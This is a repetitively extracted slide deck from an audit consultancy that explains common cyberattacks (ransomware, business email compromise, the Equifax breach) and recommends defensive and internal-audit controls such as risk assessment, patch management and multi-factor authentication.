bull Some attack vectors do not require Phishing email
29
BEC ATTACK WALKTHROUGH
30
BEC ndash PROTECT YOUR CASHAccounting controls at all entryexit points for cash
Cash Receiptsbull Review of balances over 60 days and $10k ndash triggered review and
communication uncovered change in bank info (communication was being sent to deleted email)
bull Reports that generate overdue receivables timely for follow-upbull Elevation rules for overdue receivables
Cash Disbursementbull SOD ndash limit access to vendor master filebull Controls related to changing bank info for all vendors ndash need
more than email communication personal verification with vendor requesting change
bull Vendor set-up ndash verification of information providedbull ISNetworld ndash vetting process for vendors could require vetting
prior to set up as vendorsbull ACH debits ndash no reason to give debit access to account if done
dual approval and ZBA should be usedbull Multi-factor authentication
Treasury Cyber Insurance
Payroll Legal Liabilities
Royalties Contract Language
SOX Impact
Other Processes to Consider
31
AND MULTI-FACTOR AUTHENTICATIONbull Google has not had any of its 85000+ employees successfully phished on their work-related accounts since early 2017
when it began requiring all employees to use physical Security Keys in place of passwords and one-time codes
bull Office 365 and other cloud-based services should all use multi-factor Authentication
32
Many companies do not know where to start with cybersecurity how to evaluate what is enough or how to recover when their best efforts still result in a cyber breach
Main reasons for companies struggles are
BARRIERS TO EFFECTIVE CYBERSECURITY
bull Lack of skilled resources (people and time)
bull Lack of funds
bull Continued innovations in Technology
bull Expansion of the Attack Surface
bull Lack of understanding of companyrsquos information assets and value
bull Failure to properly understand threats and risks
bull Failure to implement core security protocols and procedures
33
Defense-in-Depth approach to Cybersecurity is a layered approach to cybersecurity that recognizes a companyrsquos first line of defense may fail and integrates multiple layers of defense around a companyrsquos information assets Also called the Castle Approach (once you breach the walls more defenses are in place)
DEFENSE IN-DEPTH APPROACH
Patch Management Operating System EOL
Network Vulnerability Scanning Security Staffing
Internal amp External Network Boundaries Wireless Security
Firewall Implementation and Monitoring (including NextGen) IPS IDS SIEM Implementations
Firewall Dataflow amp Standards Documentation Cloud Service Provider Evaluations
Security Incident Management Physical Security
Evaluation of Encryption Technologies Network Access Control
Workstation Endpoint Protection
CYBERSECURITY DEFENSE IN-DEPTH
PEOPLE
TECHNOLOGYPROCESSES
THE PEOPLE CHALLENGEHumans remain one of the weakest links in security chain Ensure you have a strong security awareness training program
THE TECHNOLOGY CHALLENGEThe increasing sophistication and rate of attacks means that constant upkeep and tracking of technology changes is essential
THE PROCESS CHALLENGEEnsure best practice processes and associated management frameworks are in place Regular audits and reviews are important
35
Step 1 - Identify risks through formal risk assessment of assets
Step 2 - Perform baseline gap analysis of the current control environment to industry standard frameworks and identify controls which need to be implemented to reduce the risk of cybersecurity incidents effecting critical data assets
Step 3 - Make recommendations on implementation and ongoing management of cybersecurity controls
Step 4 - Follow-up reviews to monitor control implementation progress
Repeat
WHERE AUDIT CAN HELP
Risk Assessments
Create a BaselineGap
Analysis
Implement and Manage
Controls
Assess amp Report
36
bull Perform risk assessments to understand the organizational risk and where high-risk assets exist
bull Risk assessment should include interviews of departments outside of IT to ensure all critical data asset types are identified
bull Work with IT to classify each of the asset types to assist in measuring overall risk of a cybersecurity event
bull Consider using a Threat Modeling tool to semi-qualitatively measure cybersecurity risks to identify estimate and prioritize information security risks
STEP 1 - CYBERSECURITY RISK ASSESSMENT
Identification of Assets
Asset Locations
Classification of Assets
Threat Modeling
Calculated Risk Results
Key to an effective cybersecurity program is to understand the Companyrsquos information assets
STEP 1 - CYBERSECURITY RISK ASSESSMENT
bull What Value Do the Assets Havebull Credit Card Databull Employee or Customer Recordsbull Bank Accountsbull Intellectual Propertybull Trade Secretsbull Insider Knowledgebull Data Locationbull Cash In Cash Out Processesbull Who Would Want the Data
37
38
bull Through formal risk assessments with all critical functions in the business identify where data lives and how the data should be classified then perform a threat analysis to semi-qualitatively determine the risk of a particular cybersecurity incident occurring This allows you to determine the critical data assets in your environment that are at most risk of a cybersecurity incident
bull Use this data to evaluate and identify the cybersecurity framework controls to put in place for your business
STEP 1 - CYBERSECURITY RISK ASSESSMENT
Example screenshot of a critical data asset risk assessment
bull Perform walkthroughs with information technology department to understand cybersecurity controls in place
bull Evaluate control design as it relates to commonly accepted framework(s)
bull Identify control gaps and create a baseline for cybersecurity maturity in the organization
STEP 2 - BASELINE GAP ANALYSIS
39
40
bull Perform walkthroughs with information technology department to understand cybersecurity controls in place
bull Evaluate control design as it relates to commonly accepted framework(s)
bull Identify control gaps and create a baseline for cybersecurity maturity in the organization
bull Use the cybersecurity maturity baseline and risk assessment results to identify and prioritize controls to implement including the highest priority most impactful controls that should be implemented first
STEP 2 - BASELINE GAP ANALYSIS
41
bull The Baseline Gap Analysis facilitates the Identification of controls which will most reduce the risk of cybersecurity threats to the greatest number of critical data assets (as identified during the risk assessment)
bull Work with IT Management to identify realistic and feasible mitigating controls and an implementation roadmap
1
79
25 2523
8
18
6
12
16
6
16
3
25 25
7
1514
MITIGATING CONTROL COUNTS
A) Identify Info Systems with calc cybersecurity risk gt 100
B) Does Info system have the SPECIFIC THREAT cybersecurity risk over 100 (Yes No) If yes move to next step
C) Identified mitigating controls to implement to mitigate threat
D) Totaled all instances where controls reduced risk
STEP 3 - CONTROLS ANALYSIS
42
bull Leverage information gained during the project to provide management with a detailed mapping of the organizations cybersecurity position
bull Consider using the COBIT Process Capability Model to map out the CSC framework which will allow management to begin tracking cybersecurity maturity
5 = OPTIMIZED
4 = PREDICTABLE
3 = ESTABLISHED
2 = MANAGED
1 = PERFORMED
STEP 4 - CYBERSECURITY REPORTING
CYBERSECURITY FRAMEWORKS AND GUIDANCE
NIST
bull NIST SP 800-53 r5 Recommended Security Controls for Federal Information Systems and Organizations
bull NIST Cyber Security Framework v 11
bull Various other NIST special publications
Center for Internet Security
bull Critical Security Controls (formerly SAN Top 20)
International Organization for Standardization
bull ISO ndash 27001 family ndash Information security management systems
ISACA
bull Implementing the NIST Cybersecurity Framework Using COBIT 5
Does company size matterCompanies with more than 10000 employees are slightly more likely to have adopted a security framework (90) but even smaller companies with fewer than 1000 employees report significant rates of adoption (77) ndash Source itgovernanceusacom
According to Tenablersquos Trends in Security Framework Adoption Survey 84 of organizations in the US leverage a security framework in their organization and 44 use more than one framework - Source itgovernanceusacom
43
44
CENTER FOR INTERNET SECURITY ndash CRITICAL SECURITY CONTROLS
45
CYBERSECURITY ndash WHAT INTERNAL AUDIT CAN DO
User and Administrator Level Access
bull Companies fail to adequately assess user access levels to ensure that the principle of least privilege is applied throughout IT systems Donrsquot just think SOX
bull Confirm IT is not using privileged accounts for daily tasks that can include browsing the internet or answering email
bull Determine whether privileged and admin account passwords are held at a higher standard than normal accounts (complexity length change frequency sharing)
bull Consider how IT monitors and is alerted on changes to elevated privileges
User Cybersecurity Training and Awareness
bull Companies often fail to implement basic end user training around cybersecurity Often times the uneducated or untrained end user is the Cyber attackers first entry point into the company
bull Determine whether your company conducts random phishing awareness training campaigns
bull Evaluate your companyrsquos overall cybersecurity training awareness program
46
CYBERSECURITY ndash WHAT INTERNAL AUDIT CAN DO
Vulnerability Management bull Most companies fail to implement sound patch management processes and procedures which includes
bull 99 of exploited vulnerabilities were comprised more than a year after the patch was published
bull Companies do not know all of the Information devices in their network and therefore are unable to adequately assess their patch management process
bull Ensure your IT departments are scanning all assets continuously to ensure newly discovered vulnerabilities are identified quickly
bull Validate the patch management process is effective in ensuring all IT devices are properly updated (patched) to reflect the latest software update or release from the vendor This includes workstations servers network equipment VMware Citrix non-Microsoft software etc
bull If known vulnerabilities cannot be patched due to business reasons determine whether those risks are formally accepted and tracked by management Assess whether there are sufficient mitigating controls in place
47
CYBERSECURITY ndash SUMMARY QUICK HIT LIST
REVIEW AT LEAST THE FOLLOWING FOR YOUR COMPANYbull Obtain a basic understanding of your critical information assets where they are
stored and how they are protected
bull Perform an Inventory of IT devices and assess each devicersquos risk relating to patches
bull Understand your companyrsquos fundamental process around Patch Management and focus on higher risk areas such as internet facing devices and software with known vulnerabilities (Adobe Java Browsers Operating Systems)
bull Perform an inventory of all User and Admin IDs Understand the access each ID has in your environment and why that access level is necessary Assess whether password levels and parameters are adequate (password length characters and change interval)
bull Implement a continual end user training program
bull Ensure backups and recovery plans work as intended and are properly segregated
bull Understand the coverage and terms of your companyrsquos cyber insurance policy
bull Assess the requirement for Multi-factor Authentication
48
ANATOMY OF AN ATTACK
49
QUESTIONS
David Losacco Principalmobile (918) 625-8870
davidlosaccostinnett-associatescom
Stinnett amp Associatesstinnett-associatescom
Dallas | Denver | Houston | Oklahoma City | San Antonio | Tulsa
15
ATTACKS IN THE HEADLINES
httpswwwcsoonlinecomarticle3258748the-mirai-botnet-explained-how-teen-scammers-and-cctv-cameras-almost-brought-down-the-internethtml
httpswwwwiredcomstoryreaper-iot-botnet-infected-million-networks
16
COMMON TERMS AND DEFINITIONSMiddleware ndash Software that facilitates exchange of data between two application programs within the same environment or across different hardware and network environments Three basic types of middleware are (1) communication middleware (2) database middleware and (3) system middleware
Man-in-the-Middle (MITM) Attacks ndash An attack occurrence where the attacker has been able to place themselves in the middle of communications between two parties The Attacker is able to alter or obtain data for themselves while unknown to the other two parties
SQL Injection and Cross-site scripting Attacks ndash An attack occurrence where the attacker injects malicious code into a website In SQL Injection the attacker uses SQL language to obtain information back from the website that was unintended In Cross-site scripting the attacker injects code that only impacts other users of website
17
ATTACKS IN THE HEADLINES
httpswwwzdnetcomarticleman-in-the-middle-flaw-left-smartphone-banking-apps-vulnerable
httpskrebsonsecuritycom201809secret-service-warns-of-surge-in-atm-wiretapping-attackscomment-page-1httpswwwscmagazinecomhomesecurity-newscisco-patches-prime-license-
manager-sql-injection-vulnerability
httpswwwtechrepubliccomarticlebritish-airways-data-theft-demonstrates-need-for-cross-site-scripting-restrictions
18
COMMON TERMS AND DEFINITIONSCommon Vulnerability and Exposures (CVE) ndash Catalog sponsored by Homeland Security that documents known Cyber threats Vulnerabilities are known errors in a system or software that provides an attacker with direct access Exposures are known errors that allow an attacked indirect access which may allow the attacker to gather knowledge or content Many of the malwares and cyber attacks in the news resulted from attackers utilizing a vulnerability that had been known and fixed by the vendor for several months or years but not fixed at the company level
Zero Day VulnerabilityAttack ndash An unknown or newly discovered vulnerability that has not yet been fixed by the software or system provider Zero day vulnerabilities are the most difficult to protect against and detect due to the lack of knowledge and support by vendor
Advanced Persistent Threat ndash A set of stealthy and continuous computer hacking processes often orchestrated by a person or persons targeting a specific entity
19
Malware is short for malicious software Malware is a broad term that encompasses computer viruses worms Trojan horses spyware adware and Ransomware Malware is designed to interfere with normal computer operation usually giving hackers a chance to gain access to your computer and collect sensitive personal information
MALWARE
bull Malware is seen as first access point used in connection with Hacking attempts
bull Ransomware is a version of Malware that has been in the headlines
bull Malware can grant command and control of a device to the hackers
bull 1 in 131 emails contained Malware in 2016
bull ldquoFilelessrdquo Malware is a new variant that is more difficult to detect
20
bull Attack started early March 2017 with hackers using a Bot programmed to search the web for a recently
released CVE (Common Vulnerability and Exposure)
bull Took the hackers two months before they found the vulnerability on one of Equifaxrsquos websites used to help
customers with claims
COMPLEXITY BEHIND THE EQUIFAX ATTACK
bull Hackers then used another vulnerability (a Fileless Malware
named Apache Struts) that was also a CVE that had been
issued a month before but never fixed
bull Hackers spent an estimated 76 days in the network and
downloaded records from 51 different databases
bull Over 148 million records were stolen
bull Attack was not identified until July 30 2017
21
In addition to US consumers the UK Data Protection Authority the Information Commissionerrsquos Office reported
bull Approximately 20000 UK data subjects had names dates of birth telephone numbers and driving license numbers exposed
bull More than 600000 UK data subjects had names dates of birth and telephone numbers exposed
bull Up to 15 million UK data subjects had names and dates of birth exposed
EQUIFAX ndash WHAT WAS LOST
22
COMMON TERMS AND DEFINITIONSDark Web Darknet ndash Websites located on the internet that are not accessible by normal search engines or means Darknet sites require special software such as TOR (The Onion Router) that helps keep users anonymous Darknet sites are used for several illegal activities such as black market purchasing of stolen PII or Credit card data as well as Botnet rentals Bitcoins are traded on the Dark Web
Bitcoin ndash A digital currency created in 2009 There are no physical bitcoins only balances kept on a public ledger in the cloud that ndash along with all Bitcoin transactions ndash is verified by a massive amount of computing power Bitcoin mining is the process through which bitcoins are released to come into circulation and involves solving a computationally difficult puzzle to discover a new block which is added to the blockchain and receiving a reward in the form of few bitcoins As more and more bitcoins are created the difficulty of the mining process ndash that is the amount of computing power involved ndash increases
23
RANSOMWAREA type of malware that prevents or limits users from accessing their system either by locking the systems screen or by locking the users files unless a ransom is paid Ransomware typically encrypts certain file types on infected systems and forces users to pay the ransom through certain online payment methods to get a decrypt key
bull The Use of BITCOINS is typically the payment method
bull Ransomware attacks were growing at a rate of 350 annually until 2017 and have now dropped but still present (HR and Healthcare companies both in February)
bull WannaCry Ransomware attack impacted over 200000 people across 150 countries (included a Worm)
24
RANSOMWARERansomware-As-A-Service allows any amateur attacker to get into the business with basic knowledge and less effort The Amateur attacker can visit a RAAS site on the dark web and set up an account to create the Ransomware package It is up to the attacker to distribute the ransomware while the RaaS will handle the ransom payments The RaaS developer takes a cut of any payments that are made The developer will also reduce their cut depending on the volume of payments received
25
bull Business Email Compromise (BEC) is an exploit targeting a companyrsquos corporate email accounts and impersonating or ldquospoofingrdquo the email identity of an employee or company executive in order to fraudulently obtain moneys or sensitive information from the company its business partners andor employees
bull The FBIs Internet Crime Complaint Center or IC3 said that based on fraud reports submitted from October 2013 to May 2018 there were 41058 total US victims of BEC schemes which collectively lost at least $29 billion while global losses were more than four times that amount (FBI Global Business Email Compromise Losses Hit $125 Billion)
bull BEC exploits have become so concerning that the SEC issued a Report of Investigation in October 2018 (httpswwwsecgovlitigationinvestreport34-84429pdf) The report was considered a ldquohighly unusual actionrdquo by the SEC and identified nine companies that had been specifically investigated by the SEC due to a BEC incident
bull All nine lost at least $1 Million due to BEC scam
bull Two companies lost more then $30 Million each
bull In total the nine issuers lost almost $100 Million
BUSINESS EMAIL COMPROMISE (BEC)
26
A form of social engineering in which a message typically an email with a malicious attachment or link is sent to a victim with the intent of tricking the recipient to open an attachment
BEC amp PHISHING
Spear PhishingPhishing attacks directed at a specific individual or company Sub-category of Spear phishing includes Cloning (using a previous legitimate email) and Whaling (attacking a high-level executive)
bull CEO Email to Treasurerbull HR Phishing for Employee Databull W2 Phishing Data (IRS sent out warning)
The majority of Phishing cases are used as a means to install Malware onto a host environment
27
Most companies battle the increased Phishing and Spear-phishing attacks by labeling each external email with some form of the following inserts
PHISHING EMAIL EXAMPLE
This ldquoband-aidrdquo is still widely in practice today however
28
bull Office 365 is Microsoftrsquos Cloud-based solution offering everything from email and Excel to cloud storage
bull Microsoft Office 365 is now in use at over 70 of Fortune 500 Companies
bull 20 of all companies use Office 365
bull Office 365 overtook Office products in 4th quarter 2017 as the largest revenue stream for Microsoft
BEC amp OFFICE 365
bull Most companies do not correctly set up Office 365
Security or Logging
bull Significant increase in attack vectors against Office
365
bull Only takes one employee and the hacker is internal to
email and Office 365
bull Some attack vectors do not require Phishing email
29
BEC ATTACK WALKTHROUGH
30
BEC ndash PROTECT YOUR CASHAccounting controls at all entryexit points for cash
Cash Receiptsbull Review of balances over 60 days and $10k ndash triggered review and
communication uncovered change in bank info (communication was being sent to deleted email)
bull Reports that generate overdue receivables timely for follow-upbull Elevation rules for overdue receivables
Cash Disbursementbull SOD ndash limit access to vendor master filebull Controls related to changing bank info for all vendors ndash need
more than email communication personal verification with vendor requesting change
bull Vendor set-up ndash verification of information providedbull ISNetworld ndash vetting process for vendors could require vetting
prior to set up as vendorsbull ACH debits ndash no reason to give debit access to account if done
dual approval and ZBA should be usedbull Multi-factor authentication
Treasury Cyber Insurance
Payroll Legal Liabilities
Royalties Contract Language
SOX Impact
Other Processes to Consider
31
AND MULTI-FACTOR AUTHENTICATIONbull Google has not had any of its 85000+ employees successfully phished on their work-related accounts since early 2017
when it began requiring all employees to use physical Security Keys in place of passwords and one-time codes
bull Office 365 and other cloud-based services should all use multi-factor Authentication
32
Many companies do not know where to start with cybersecurity how to evaluate what is enough or how to recover when their best efforts still result in a cyber breach
Main reasons for companies struggles are
BARRIERS TO EFFECTIVE CYBERSECURITY
bull Lack of skilled resources (people and time)
bull Lack of funds
bull Continued innovations in Technology
bull Expansion of the Attack Surface
bull Lack of understanding of companyrsquos information assets and value
bull Failure to properly understand threats and risks
bull Failure to implement core security protocols and procedures
33
Defense-in-Depth approach to Cybersecurity is a layered approach to cybersecurity that recognizes a companyrsquos first line of defense may fail and integrates multiple layers of defense around a companyrsquos information assets Also called the Castle Approach (once you breach the walls more defenses are in place)
DEFENSE IN-DEPTH APPROACH
Patch Management Operating System EOL
Network Vulnerability Scanning Security Staffing
Internal amp External Network Boundaries Wireless Security
Firewall Implementation and Monitoring (including NextGen) IPS IDS SIEM Implementations
Firewall Dataflow amp Standards Documentation Cloud Service Provider Evaluations
Security Incident Management Physical Security
Evaluation of Encryption Technologies Network Access Control
Workstation Endpoint Protection
CYBERSECURITY DEFENSE IN-DEPTH
PEOPLE
TECHNOLOGYPROCESSES
THE PEOPLE CHALLENGEHumans remain one of the weakest links in security chain Ensure you have a strong security awareness training program
THE TECHNOLOGY CHALLENGEThe increasing sophistication and rate of attacks means that constant upkeep and tracking of technology changes is essential
THE PROCESS CHALLENGEEnsure best practice processes and associated management frameworks are in place Regular audits and reviews are important
35
Step 1 - Identify risks through formal risk assessment of assets
Step 2 - Perform baseline gap analysis of the current control environment to industry standard frameworks and identify controls which need to be implemented to reduce the risk of cybersecurity incidents effecting critical data assets
Step 3 - Make recommendations on implementation and ongoing management of cybersecurity controls
Step 4 - Follow-up reviews to monitor control implementation progress
Repeat
WHERE AUDIT CAN HELP
Risk Assessments
Create a BaselineGap
Analysis
Implement and Manage
Controls
Assess amp Report
36
bull Perform risk assessments to understand the organizational risk and where high-risk assets exist
bull Risk assessment should include interviews of departments outside of IT to ensure all critical data asset types are identified
bull Work with IT to classify each of the asset types to assist in measuring overall risk of a cybersecurity event
bull Consider using a Threat Modeling tool to semi-qualitatively measure cybersecurity risks to identify estimate and prioritize information security risks
STEP 1 - CYBERSECURITY RISK ASSESSMENT
Identification of Assets
Asset Locations
Classification of Assets
Threat Modeling
Calculated Risk Results
Key to an effective cybersecurity program is to understand the Companyrsquos information assets
STEP 1 - CYBERSECURITY RISK ASSESSMENT
bull What Value Do the Assets Havebull Credit Card Databull Employee or Customer Recordsbull Bank Accountsbull Intellectual Propertybull Trade Secretsbull Insider Knowledgebull Data Locationbull Cash In Cash Out Processesbull Who Would Want the Data
37
38
bull Through formal risk assessments with all critical functions in the business identify where data lives and how the data should be classified then perform a threat analysis to semi-qualitatively determine the risk of a particular cybersecurity incident occurring This allows you to determine the critical data assets in your environment that are at most risk of a cybersecurity incident
bull Use this data to evaluate and identify the cybersecurity framework controls to put in place for your business
STEP 1 - CYBERSECURITY RISK ASSESSMENT
Example screenshot of a critical data asset risk assessment
bull Perform walkthroughs with information technology department to understand cybersecurity controls in place
bull Evaluate control design as it relates to commonly accepted framework(s)
bull Identify control gaps and create a baseline for cybersecurity maturity in the organization
STEP 2 - BASELINE GAP ANALYSIS
39
40
bull Perform walkthroughs with information technology department to understand cybersecurity controls in place
bull Evaluate control design as it relates to commonly accepted framework(s)
bull Identify control gaps and create a baseline for cybersecurity maturity in the organization
bull Use the cybersecurity maturity baseline and risk assessment results to identify and prioritize controls to implement including the highest priority most impactful controls that should be implemented first
STEP 2 - BASELINE GAP ANALYSIS
41
bull The Baseline Gap Analysis facilitates the Identification of controls which will most reduce the risk of cybersecurity threats to the greatest number of critical data assets (as identified during the risk assessment)
bull Work with IT Management to identify realistic and feasible mitigating controls and an implementation roadmap
1
79
25 2523
8
18
6
12
16
6
16
3
25 25
7
1514
MITIGATING CONTROL COUNTS
A) Identify Info Systems with calc cybersecurity risk gt 100
B) Does Info system have the SPECIFIC THREAT cybersecurity risk over 100 (Yes No) If yes move to next step
C) Identified mitigating controls to implement to mitigate threat
D) Totaled all instances where controls reduced risk
STEP 3 - CONTROLS ANALYSIS
42
bull Leverage information gained during the project to provide management with a detailed mapping of the organizations cybersecurity position
bull Consider using the COBIT Process Capability Model to map out the CSC framework which will allow management to begin tracking cybersecurity maturity
5 = OPTIMIZED
4 = PREDICTABLE
3 = ESTABLISHED
2 = MANAGED
1 = PERFORMED
STEP 4 - CYBERSECURITY REPORTING
CYBERSECURITY FRAMEWORKS AND GUIDANCE
NIST
bull NIST SP 800-53 r5 Recommended Security Controls for Federal Information Systems and Organizations
bull NIST Cyber Security Framework v 11
bull Various other NIST special publications
Center for Internet Security
bull Critical Security Controls (formerly SAN Top 20)
International Organization for Standardization
bull ISO ndash 27001 family ndash Information security management systems
ISACA
bull Implementing the NIST Cybersecurity Framework Using COBIT 5
Does company size matterCompanies with more than 10000 employees are slightly more likely to have adopted a security framework (90) but even smaller companies with fewer than 1000 employees report significant rates of adoption (77) ndash Source itgovernanceusacom
According to Tenablersquos Trends in Security Framework Adoption Survey 84 of organizations in the US leverage a security framework in their organization and 44 use more than one framework - Source itgovernanceusacom
43
44
CENTER FOR INTERNET SECURITY ndash CRITICAL SECURITY CONTROLS
45
CYBERSECURITY ndash WHAT INTERNAL AUDIT CAN DO
User and Administrator Level Access
bull Companies fail to adequately assess user access levels to ensure that the principle of least privilege is applied throughout IT systems Donrsquot just think SOX
bull Confirm IT is not using privileged accounts for daily tasks that can include browsing the internet or answering email
bull Determine whether privileged and admin account passwords are held at a higher standard than normal accounts (complexity length change frequency sharing)
bull Consider how IT monitors and is alerted on changes to elevated privileges
User Cybersecurity Training and Awareness
bull Companies often fail to implement basic end user training around cybersecurity Often times the uneducated or untrained end user is the Cyber attackers first entry point into the company
bull Determine whether your company conducts random phishing awareness training campaigns
bull Evaluate your companyrsquos overall cybersecurity training awareness program
46
CYBERSECURITY ndash WHAT INTERNAL AUDIT CAN DO
Vulnerability Management bull Most companies fail to implement sound patch management processes and procedures which includes
bull 99 of exploited vulnerabilities were comprised more than a year after the patch was published
bull Companies do not know all of the Information devices in their network and therefore are unable to adequately assess their patch management process
bull Ensure your IT departments are scanning all assets continuously to ensure newly discovered vulnerabilities are identified quickly
bull Validate the patch management process is effective in ensuring all IT devices are properly updated (patched) to reflect the latest software update or release from the vendor This includes workstations servers network equipment VMware Citrix non-Microsoft software etc
bull If known vulnerabilities cannot be patched due to business reasons determine whether those risks are formally accepted and tracked by management Assess whether there are sufficient mitigating controls in place
47
CYBERSECURITY ndash SUMMARY QUICK HIT LIST
REVIEW AT LEAST THE FOLLOWING FOR YOUR COMPANYbull Obtain a basic understanding of your critical information assets where they are
stored and how they are protected
bull Perform an Inventory of IT devices and assess each devicersquos risk relating to patches
bull Understand your companyrsquos fundamental process around Patch Management and focus on higher risk areas such as internet facing devices and software with known vulnerabilities (Adobe Java Browsers Operating Systems)
bull Perform an inventory of all User and Admin IDs Understand the access each ID has in your environment and why that access level is necessary Assess whether password levels and parameters are adequate (password length characters and change interval)
bull Implement a continual end user training program
bull Ensure backups and recovery plans work as intended and are properly segregated
bull Understand the coverage and terms of your companyrsquos cyber insurance policy
bull Assess the requirement for Multi-factor Authentication
48
ANATOMY OF AN ATTACK
49
QUESTIONS
David Losacco Principalmobile (918) 625-8870
davidlosaccostinnett-associatescom
Stinnett amp Associatesstinnett-associatescom
Dallas | Denver | Houston | Oklahoma City | San Antonio | Tulsa
16
COMMON TERMS AND DEFINITIONSMiddleware ndash Software that facilitates exchange of data between two application programs within the same environment or across different hardware and network environments Three basic types of middleware are (1) communication middleware (2) database middleware and (3) system middleware
Man-in-the-Middle (MITM) Attacks ndash An attack occurrence where the attacker has been able to place themselves in the middle of communications between two parties The Attacker is able to alter or obtain data for themselves while unknown to the other two parties
SQL Injection and Cross-site scripting Attacks ndash An attack occurrence where the attacker injects malicious code into a website In SQL Injection the attacker uses SQL language to obtain information back from the website that was unintended In Cross-site scripting the attacker injects code that only impacts other users of website
17
ATTACKS IN THE HEADLINES
httpswwwzdnetcomarticleman-in-the-middle-flaw-left-smartphone-banking-apps-vulnerable
httpskrebsonsecuritycom201809secret-service-warns-of-surge-in-atm-wiretapping-attackscomment-page-1httpswwwscmagazinecomhomesecurity-newscisco-patches-prime-license-
manager-sql-injection-vulnerability
httpswwwtechrepubliccomarticlebritish-airways-data-theft-demonstrates-need-for-cross-site-scripting-restrictions
18
COMMON TERMS AND DEFINITIONSCommon Vulnerability and Exposures (CVE) ndash Catalog sponsored by Homeland Security that documents known Cyber threats Vulnerabilities are known errors in a system or software that provides an attacker with direct access Exposures are known errors that allow an attacked indirect access which may allow the attacker to gather knowledge or content Many of the malwares and cyber attacks in the news resulted from attackers utilizing a vulnerability that had been known and fixed by the vendor for several months or years but not fixed at the company level
Zero Day VulnerabilityAttack ndash An unknown or newly discovered vulnerability that has not yet been fixed by the software or system provider Zero day vulnerabilities are the most difficult to protect against and detect due to the lack of knowledge and support by vendor
Advanced Persistent Threat ndash A set of stealthy and continuous computer hacking processes often orchestrated by a person or persons targeting a specific entity
19
Malware is short for malicious software Malware is a broad term that encompasses computer viruses worms Trojan horses spyware adware and Ransomware Malware is designed to interfere with normal computer operation usually giving hackers a chance to gain access to your computer and collect sensitive personal information
MALWARE
bull Malware is seen as first access point used in connection with Hacking attempts
bull Ransomware is a version of Malware that has been in the headlines
bull Malware can grant command and control of a device to the hackers
bull 1 in 131 emails contained Malware in 2016
bull ldquoFilelessrdquo Malware is a new variant that is more difficult to detect
20
bull Attack started early March 2017 with hackers using a Bot programmed to search the web for a recently
released CVE (Common Vulnerability and Exposure)
bull Took the hackers two months before they found the vulnerability on one of Equifaxrsquos websites used to help
customers with claims
COMPLEXITY BEHIND THE EQUIFAX ATTACK
bull Hackers then used another vulnerability (a Fileless Malware
named Apache Struts) that was also a CVE that had been
issued a month before but never fixed
bull Hackers spent an estimated 76 days in the network and
downloaded records from 51 different databases
bull Over 148 million records were stolen
bull Attack was not identified until July 30 2017
21
In addition to US consumers the UK Data Protection Authority the Information Commissionerrsquos Office reported
bull Approximately 20000 UK data subjects had names dates of birth telephone numbers and driving license numbers exposed
bull More than 600000 UK data subjects had names dates of birth and telephone numbers exposed
bull Up to 15 million UK data subjects had names and dates of birth exposed
EQUIFAX ndash WHAT WAS LOST
22
COMMON TERMS AND DEFINITIONSDark Web Darknet ndash Websites located on the internet that are not accessible by normal search engines or means Darknet sites require special software such as TOR (The Onion Router) that helps keep users anonymous Darknet sites are used for several illegal activities such as black market purchasing of stolen PII or Credit card data as well as Botnet rentals Bitcoins are traded on the Dark Web
Bitcoin ndash A digital currency created in 2009 There are no physical bitcoins only balances kept on a public ledger in the cloud that ndash along with all Bitcoin transactions ndash is verified by a massive amount of computing power Bitcoin mining is the process through which bitcoins are released to come into circulation and involves solving a computationally difficult puzzle to discover a new block which is added to the blockchain and receiving a reward in the form of few bitcoins As more and more bitcoins are created the difficulty of the mining process ndash that is the amount of computing power involved ndash increases
23
RANSOMWAREA type of malware that prevents or limits users from accessing their system either by locking the systems screen or by locking the users files unless a ransom is paid Ransomware typically encrypts certain file types on infected systems and forces users to pay the ransom through certain online payment methods to get a decrypt key
bull The Use of BITCOINS is typically the payment method
bull Ransomware attacks were growing at a rate of 350 annually until 2017 and have now dropped but still present (HR and Healthcare companies both in February)
bull WannaCry Ransomware attack impacted over 200000 people across 150 countries (included a Worm)
24
RANSOMWARERansomware-As-A-Service allows any amateur attacker to get into the business with basic knowledge and less effort The Amateur attacker can visit a RAAS site on the dark web and set up an account to create the Ransomware package It is up to the attacker to distribute the ransomware while the RaaS will handle the ransom payments The RaaS developer takes a cut of any payments that are made The developer will also reduce their cut depending on the volume of payments received
25
bull Business Email Compromise (BEC) is an exploit targeting a companyrsquos corporate email accounts and impersonating or ldquospoofingrdquo the email identity of an employee or company executive in order to fraudulently obtain moneys or sensitive information from the company its business partners andor employees
bull The FBIs Internet Crime Complaint Center or IC3 said that based on fraud reports submitted from October 2013 to May 2018 there were 41058 total US victims of BEC schemes which collectively lost at least $29 billion while global losses were more than four times that amount (FBI Global Business Email Compromise Losses Hit $125 Billion)
bull BEC exploits have become so concerning that the SEC issued a Report of Investigation in October 2018 (httpswwwsecgovlitigationinvestreport34-84429pdf) The report was considered a ldquohighly unusual actionrdquo by the SEC and identified nine companies that had been specifically investigated by the SEC due to a BEC incident
bull All nine lost at least $1 Million due to BEC scam
bull Two companies lost more then $30 Million each
bull In total the nine issuers lost almost $100 Million
BUSINESS EMAIL COMPROMISE (BEC)
26
A form of social engineering in which a message typically an email with a malicious attachment or link is sent to a victim with the intent of tricking the recipient to open an attachment
BEC amp PHISHING
Spear PhishingPhishing attacks directed at a specific individual or company Sub-category of Spear phishing includes Cloning (using a previous legitimate email) and Whaling (attacking a high-level executive)
bull CEO Email to Treasurerbull HR Phishing for Employee Databull W2 Phishing Data (IRS sent out warning)
The majority of Phishing cases are used as a means to install Malware onto a host environment
27
Most companies battle the increased Phishing and Spear-phishing attacks by labeling each external email with some form of the following inserts
PHISHING EMAIL EXAMPLE
This ldquoband-aidrdquo is still widely in practice today however
28
bull Office 365 is Microsoftrsquos Cloud-based solution offering everything from email and Excel to cloud storage
bull Microsoft Office 365 is now in use at over 70 of Fortune 500 Companies
bull 20 of all companies use Office 365
bull Office 365 overtook Office products in 4th quarter 2017 as the largest revenue stream for Microsoft
BEC amp OFFICE 365
bull Most companies do not correctly set up Office 365
Security or Logging
bull Significant increase in attack vectors against Office
365
bull Only takes one employee and the hacker is internal to
email and Office 365
bull Some attack vectors do not require Phishing email
29
BEC ATTACK WALKTHROUGH
30
BEC ndash PROTECT YOUR CASHAccounting controls at all entryexit points for cash
Cash Receiptsbull Review of balances over 60 days and $10k ndash triggered review and
communication uncovered change in bank info (communication was being sent to deleted email)
bull Reports that generate overdue receivables timely for follow-upbull Elevation rules for overdue receivables
Cash Disbursementbull SOD ndash limit access to vendor master filebull Controls related to changing bank info for all vendors ndash need
more than email communication personal verification with vendor requesting change
